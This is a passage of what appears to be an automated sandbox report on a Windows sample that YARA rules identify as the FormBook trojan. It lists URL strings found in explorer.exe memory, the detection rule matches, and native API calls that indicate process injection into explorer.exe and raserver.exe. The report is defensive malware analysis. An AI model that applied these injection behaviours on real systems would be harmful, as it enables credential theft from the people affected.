              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
              Source: explorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
              Source: explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
              Source: explorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
              Source: explorer.exe, 00000002.00000002.3309996442.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000002.00000003.2979324812.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075103317.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
              Source: explorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
              Source: explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: jqPZZhDmjh.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: raserver.exe PID: 2656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A350 NtCreateFile,0_2_0098A350
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A480 NtClose,0_2_0098A480
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A400 NtReadFile,0_2_0098A400
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A530 NtAllocateVirtualMemory,0_2_0098A530
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A47C NtClose,0_2_0098A47C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098A52C NtAllocateVirtualMemory,0_2_0098A52C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2B60 NtClose,LdrInitializeThunk,0_2_015F2B60
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_015F2BF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2AD0 NtReadFile,LdrInitializeThunk,0_2_015F2AD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2D10 NtMapViewOfSection,LdrInitializeThunk,0_2_015F2D10
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2D30 NtUnmapViewOfSection,LdrInitializeThunk,0_2_015F2D30
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2DD0 NtDelayExecution,LdrInitializeThunk,0_2_015F2DD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_015F2DF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_015F2C70
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2CA0 NtQueryInformationToken,LdrInitializeThunk,0_2_015F2CA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2F30 NtCreateSection,LdrInitializeThunk,0_2_015F2F30
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2FE0 NtCreateFile,LdrInitializeThunk,0_2_015F2FE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2F90 NtProtectVirtualMemory,LdrInitializeThunk,0_2_015F2F90
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2FB0 NtResumeThread,LdrInitializeThunk,0_2_015F2FB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2E80 NtReadVirtualMemory,LdrInitializeThunk,0_2_015F2E80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_015F2EA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F4340 NtSetContextThread,0_2_015F4340
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F4650 NtSuspendThread,0_2_015F4650
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2BE0 NtQueryValueKey,0_2_015F2BE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2B80 NtQueryInformationFile,0_2_015F2B80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2BA0 NtEnumerateValueKey,0_2_015F2BA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2AF0 NtWriteFile,0_2_015F2AF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2AB0 NtWaitForSingleObject,0_2_015F2AB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2D00 NtSetInformationFile,0_2_015F2D00
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2DB0 NtEnumerateKey,0_2_015F2DB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2C60 NtCreateKey,0_2_015F2C60
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2C00 NtQueryInformationProcess,0_2_015F2C00
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2CC0 NtQueryVirtualMemory,0_2_015F2CC0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2CF0 NtOpenProcess,0_2_015F2CF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2F60 NtCreateProcessEx,0_2_015F2F60
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2FA0 NtQuerySection,0_2_015F2FA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2E30 NtWriteVirtualMemory,0_2_015F2E30
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2EE0 NtQueueApcThread,0_2_015F2EE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F3010 NtOpenDirectoryObject,0_2_015F3010
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F3090 NtSetValueKey,0_2_015F3090
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F35C0 NtCreateMutant,0_2_015F35C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F39B0 NtGetContextThread,0_2_015F39B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F3D70 NtOpenThread,0_2_015F3D70
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F3D10 NtOpenProcessToken,0_2_015F3D10
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7C232 NtCreateFile,2_2_0DF7C232
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7DE12 NtProtectVirtualMemory,2_2_0DF7DE12
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7DE0A NtProtectVirtualMemory,2_2_0DF7DE0A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412C60 NtCreateKey,LdrInitializeThunk,3_2_04412C60
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04412C70
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04412CA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04412D10
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412DD0 NtDelayExecution,LdrInitializeThunk,3_2_04412DD0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04412DF0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_04412EA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412F30 NtCreateSection,LdrInitializeThunk,3_2_04412F30
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412FE0 NtCreateFile,LdrInitializeThunk,3_2_04412FE0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412AD0 NtReadFile,LdrInitializeThunk,3_2_04412AD0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412B60 NtClose,LdrInitializeThunk,3_2_04412B60
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04412BE0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04412BF0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044135C0 NtCreateMutant,LdrInitializeThunk,3_2_044135C0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04414650 NtSuspendThread,3_2_04414650
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04414340 NtSetContextThread,3_2_04414340
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412C00 NtQueryInformationProcess,3_2_04412C00
